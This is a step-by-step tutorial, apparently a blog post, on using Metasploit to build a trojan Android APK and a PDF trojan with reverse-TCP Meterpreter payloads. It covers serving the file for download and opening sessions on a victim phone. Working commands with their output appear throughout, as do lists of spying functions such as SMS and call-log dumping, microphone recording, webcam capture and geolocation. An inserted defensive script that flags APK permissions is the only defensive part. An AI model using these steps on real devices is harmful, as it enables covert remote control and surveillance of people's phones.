
Using Metasploit against Android

Generating a trojan APK with Metasploit

msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.105 LPORT=4444 R > /root/webTest/test.apk

LHOST is the host that receives the reverse shell.

LPORT is the port it listens on.

If the address points at a server on the public Internet, the traffic can be forwarded through port mapping, which gives remote control from outside the local network.

Start the Apache service

service apache2 start

Then visit http://ip/test.apk to download the trojan APK.

Start PostgreSQL

service postgresql start

Start msfconsole

msf > use exploit/multi/handler 
msf exploit(multi/handler) > show options 

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target


msf exploit(multi/handler) > show payloads 
Too many payloads, omitted...

msf exploit(multi/handler) > set payload android/meterpreter/reverse_tcp 
payload => android/meterpreter/reverse_tcp
msf exploit(multi/handler) > show options 

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (android/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target


msf exploit(multi/handler) > set LHOST 192.168.1.105
msf exploit(multi/handler) > exploit -j
[*] Exploit running as background job 0.

[*] Started reverse TCP handler on 192.168.1.105:4444 

Install and run the APK on the Android device

[*] Started reverse TCP handler on 192.168.1.105:4444 
[*] Sending stage (70525 bytes) to 192.168.1.106
[*] Meterpreter session 2 opened (192.168.1.105:4444 -> 192.168.1.106:40804) at 2018-10-12 22:50:21 +0800

meterpreter > 

Connection established!

meterpreter > sysinfo 
Computer    : localhost
OS          : Android 4.4.2 - Linux 3.10.30-00002-g71dd235 (armv7l)
Meterpreter : dalvik/android
meterpreter > shell 
Process 1 created.
Channel 1 created.
id
uid=10098(u0_a98) gid=10098(u0_a98) groups=1015(sdcard_rw),1023(media_rw),1028(sdcard_r),3003(inet),50098(all_a98) context=u:r:untrusted_app:s0

From here it is possible to download the call log, read SMS messages, pick a camera, and so on.

Use help to list the available functions

meterpreter > help 

Core Commands
=============

    Command                   Description
    -------                   -----------
    ?                         Help menu
    background                Backgrounds the current session
    bgkill                    Kills a background meterpreter script
    bglist                    Lists running background scripts
    bgrun                     Executes a meterpreter script as a background thread
    channel                   Displays information or control active channels
    close                     Closes a channel
    disable_unicode_encoding  Disables encoding of unicode strings
    enable_unicode_encoding   Enables encoding of unicode strings
    exit                      Terminate the meterpreter session
    get_timeouts              Get the current session timeout values
    guid                      Get the session GUID
    help                      Help menu
    info                      Displays information about a Post module
    irb                       Open an interactive Ruby shell on the current session
    load                      Load one or more meterpreter extensions
    machine_id                Get the MSF ID of the machine attached to the session
    pry                       Open the Pry debugger on the current session
    quit                      Terminate the meterpreter session
    read                      Reads data from a channel
    resource                  Run the commands stored in a file
    run                       Executes a meterpreter script or Post module
    sessions                  Quickly switch to another session
    set_timeouts              Set the current session timeout values
    sleep                     Force Meterpreter to go quiet, then re-establish session.
    transport                 Change the current transport mechanism
    use                       Deprecated alias for "load"
    uuid                      Get the UUID for the current session
    write                     Writes data to a channel


Stdapi: File system Commands
============================

    Command       Description
    -------       -----------
    cat           Read the contents of a file to the screen
    cd            Change directory
    checksum      Retrieve the checksum of a file
    cp            Copy source to destination
    dir           List files (alias for ls)
    download      Download a file or directory
    edit          Edit a file
    getlwd        Print local working directory
    getwd         Print working directory
    lcd           Change local working directory
    lls           List local files
    lpwd          Print local working directory
    ls            List files
    mkdir         Make directory
    mv            Move source to destination
    pwd           Print working directory
    rm            Delete the specified file
    rmdir         Remove directory
    search        Search for files
    upload        Upload a file or directory


Stdapi: Networking Commands
===========================

    Command       Description
    -------       -----------
    ifconfig      Display interfaces
    ipconfig      Display interfaces
    portfwd       Forward a local port to a remote service
    route         View and modify the routing table


Stdapi: System Commands
=======================

    Command       Description
    -------       -----------
    execute       Execute a command
    getuid        Get the user that the server is running as
    localtime     Displays the target system's local date and time
    pgrep         Filter processes by name
    ps            List running processes
    shell         Drop into a system command shell
    sysinfo       Gets information about the remote system, such as OS


Stdapi: User interface Commands
===============================

    Command       Description
    -------       -----------
    screenshot    Grab a screenshot of the interactive desktop


Stdapi: Webcam Commands
=======================

    Command        Description
    -------        -----------
    record_mic     Record audio from the default microphone for X seconds
    webcam_chat    Start a video chat
    webcam_list    List webcams
    webcam_snap    Take a snapshot from the specified webcam
    webcam_stream  Play a video stream from the specified webcam


Stdapi: Audio Output Commands
=============================

    Command       Description
    -------       -----------
    play          play an audio file on target system, nothing written on disk


Android Commands
================

    Command           Description
    -------           -----------
    activity_start    Start an Android activity from a Uri string
    check_root        Check if device is rooted
    dump_calllog      Get call log
    dump_contacts     Get contacts list
    dump_sms          Get sms messages
    geolocate         Get current lat-long using geolocation
    hide_app_icon     Hide the app icon from the launcher
    interval_collect  Manage interval collection capabilities
    send_sms          Sends SMS from target session
    set_audio_mode    Set Ringer Mode
    sqlite_query      Query a SQLite database from storage
    wakelock          Enable/Disable Wakelock
    wlan_geolocate    Get current lat-long using WLAN informatio
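A defender-side example, added here and not part of the original post: every Android command above only works if the trojan APK declares the matching permission, so an APK's permission list can be triaged against that capability set. The script takes the text printed by `aapt dump permissions <apk>` as input; the command-to-permission mapping and the two sample outputs are constructed for this example, not something Metasploit publishes.

```python
"""Triage an APK's declared permissions against the spying capabilities of an
Android Meterpreter session (dump_sms, dump_calllog, record_mic, ...).
Input is `aapt dump permissions <apk>` text; the samples here are constructed."""
import re

# Meterpreter command (from the Android/Webcam command lists) -> permission
# the APK must declare for that command to work on the device.
CAPABILITY_PERMS = {
    "reverse_tcp stager": "android.permission.INTERNET",
    "dump_sms": "android.permission.READ_SMS",
    "send_sms": "android.permission.SEND_SMS",
    "dump_calllog": "android.permission.READ_CALL_LOG",
    "dump_contacts": "android.permission.READ_CONTACTS",
    "geolocate": "android.permission.ACCESS_FINE_LOCATION",
    "wlan_geolocate": "android.permission.ACCESS_WIFI_STATE",
    "record_mic": "android.permission.RECORD_AUDIO",
    "webcam_snap": "android.permission.CAMERA",
    "wakelock": "android.permission.WAKE_LOCK",
}
PERM_LINE = re.compile(r"^uses-permission: name='([^']+)'")

def declared_permissions(aapt_output):
    """Set of permission names found in `aapt dump permissions` output."""
    perms = set()
    for line in aapt_output.splitlines():
        m = PERM_LINE.match(line.strip())
        if m:
            perms.add(m.group(1))
    return perms

def meterpreter_capabilities(perms):
    """Commands from the list above that this permission set would enable."""
    return [cmd for cmd, perm in CAPABILITY_PERMS.items() if perm in perms]

def triage(aapt_output, threshold=5):
    """Flag an APK whose permissions cover `threshold` or more capabilities."""
    cmds = meterpreter_capabilities(declared_permissions(aapt_output))
    return {"capabilities": cmds, "suspicious": len(cmds) >= threshold}

# Constructed samples with placeholder package names, not real apps.
SUSPECT = "package: com.example.suspect\n" + "".join(
    "uses-permission: name='%s'\n" % p for p in CAPABILITY_PERMS.values())
BENIGN = ("package: com.example.notes\n"
          "uses-permission: name='android.permission.INTERNET'\n"
          "uses-permission: name='android.permission.ACCESS_NETWORK_STATE'\n")

if __name__ == "__main__":
    print(triage(SUSPECT))  # every capability in the map -> suspicious
    print(triage(BENIGN))   # only the stager's INTERNET -> not suspicious
```

A notes app that declares the same permissions as a stage payload is the signal; the threshold is a starting point to tune against a real app inventory.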

Android exploitation modules

msf > search android

Matching Modules
================

   Name                                                       Disclosure Date  Rank       Description
   ----                                                       ---------------  ----       -----------
   auxiliary/admin/android/google_play_store_uxss_xframe_rce                   normal     Android Browser RCE Through Google Play Store XFO
   auxiliary/dos/android/android_stock_browser_iframe         2012-12-01       normal     Android Stock Browser Iframe DOS
   auxiliary/gather/android_browser_file_theft                                 normal     Android Browser File Theft
   auxiliary/gather/android_browser_new_tab_cookie_theft                       normal     Android Browser "Open in New Tab" Cookie Theft
   auxiliary/gather/android_htmlfileprovider                                   normal     Android Content Provider File Disclosure
   auxiliary/gather/android_object_tag_webview_uxss           2014-10-04       normal     Android Open Source Platform (AOSP) Browser UXSS
   auxiliary/gather/android_stock_browser_uxss                                 normal     Android Open Source Platform (AOSP) Browser UXSS
   auxiliary/gather/firefox_pdfjs_file_theft                                   normal     Firefox PDF.js Browser File Theft
   auxiliary/gather/samsung_browser_sop_bypass                2017-11-08       normal     Samsung Internet Browser SOP Bypass
   auxiliary/scanner/sip/sipdroid_ext_enum                                     normal     SIPDroid Extension Grabber
   auxiliary/server/android_browsable_msf_launch                               normal     Android Meterpreter Browsable Launcher
   auxiliary/server/android_mercury_parseuri                                   normal     Android Mercury Browser Intent URI Scheme and Directory Traversal Vulnerability
   exploit/android/adb/adb_server_exec                        2016-01-01       excellent  Android ADB Debug Server Remote Payload Execution
   exploit/android/browser/samsung_knox_smdm_url              2014-11-12       excellent  Samsung Galaxy KNOX Android Browser RCE
   exploit/android/browser/stagefright_mp4_tx3g_64bit         2015-08-13       normal     Android Stagefright MP4 tx3g Integer Overflow
   exploit/android/browser/webview_addjavascriptinterface     2012-12-21       excellent  Android Browser and WebView addJavascriptInterface Code Execution
   exploit/android/fileformat/adobe_reader_pdf_js_interface   2014-04-13       good       Adobe Reader for Android addJavascriptInterface Exploit
   exploit/android/local/futex_requeue                        2014-05-03       excellent  Android 'Towelroot' Futex Requeue Kernel Exploit
   exploit/android/local/put_user_vroot                       2013-09-06       excellent  Android get_user/put_user Exploit
   exploit/multi/hams/steamed                                 2018-04-01       manual     Steamed Hams
   exploit/multi/handler                                                       manual     Generic Payload Handler
   exploit/multi/local/allwinner_backdoor                     2016-04-30       excellent  Allwinner 3.4 Legacy Kernel Local Privilege Escalation
   payload/android/meterpreter/reverse_http                                    normal     Android Meterpreter, Android Reverse HTTP Stager
   payload/android/meterpreter/reverse_https                                   normal     Android Meterpreter, Android Reverse HTTPS Stager
   payload/android/meterpreter/reverse_tcp                                     normal     Android Meterpreter, Android Reverse TCP Stager
   payload/android/meterpreter_reverse_http                                    normal     Android Meterpreter Shell, Reverse HTTP Inline
   payload/android/meterpreter_reverse_https                                   normal     Android Meterpreter Shell, Reverse HTTPS Inline
   payload/android/meterpreter_reverse_tcp                                     normal     Android Meterpreter Shell, Reverse TCP Inline
   payload/android/shell/reverse_http                                          normal     Command Shell, Android Reverse HTTP Stager
   payload/android/shell/reverse_https                                         normal     Command Shell, Android Reverse HTTPS Stager
   payload/android/shell/reverse_tcp                                           normal     Command Shell, Android Reverse TCP Stager
   post/android/capture/screen                                                 normal     Android Screen Capture
   post/android/gather/sub_info                                                normal     extracts subscriber info from target device
   post/android/gather/wireless_ap                                             normal     Displays wireless SSIDs and PSKs
   post/android/manage/remove_lock                            2013-10-11       normal     Android Settings Remove Device Locks (4.0-4.3)
   post/android/manage/remove_lock_root                                        normal     Android Root Remove Device Locks (root)
   post/multi/gather/wlan_geolocate                                            normal     Multiplatform WLAN Enumeration and Geolocation
   post/multi/manage/play_youtube                                              normal     Multi Manage YouTube Broadcast
   post/multi/manage/set_wallpaper                                             normal     Multi Manage Set Wallpaper
   post/multi/recon/local_exploit_suggester                                    normal     Multi Recon Local Exploit Suggester


PDF trojan

msf exploit(android/fileformat/adobe_reader_pdf_js_interface) > set LHOST 192.168.1.105
LHOST => 192.168.1.105
msf exploit(android/fileformat/adobe_reader_pdf_js_interface) > show options 

Module options (exploit/android/fileformat/adobe_reader_pdf_js_interface):

   Name              Current Setting  Required  Description
   ----              ---------------  --------  -----------
   FILENAME          msf.pdf          yes       The file name.
   PDF::Encoder      ASCIIHEX         yes       Select encoder for JavaScript Stream, valid values are ASCII85, FLATE, and ASCIIHEX
   PDF::Method       DOCUMENT         yes       Select PAGE, DOCUMENT, or ANNOTATION
   PDF::MultiFilter  1                yes       Stack multiple encodings n times
   PDF::Obfuscate    true             yes       Whether or not we should obfuscate the output


Payload options (android/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.1.105    yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port

   **DisablePayloadHandler: True   (RHOST and RPORT settings will be ignored!)**


Exploit target:

   Id  Name
   --  ----
   0   Android ARM


msf exploit(android/fileformat/adobe_reader_pdf_js_interface) > exploit 

[*] Generating Javascript exploit...
[*] Creating PDF...
[+] msf.pdf stored at /root/.msf4/local/msf.pdf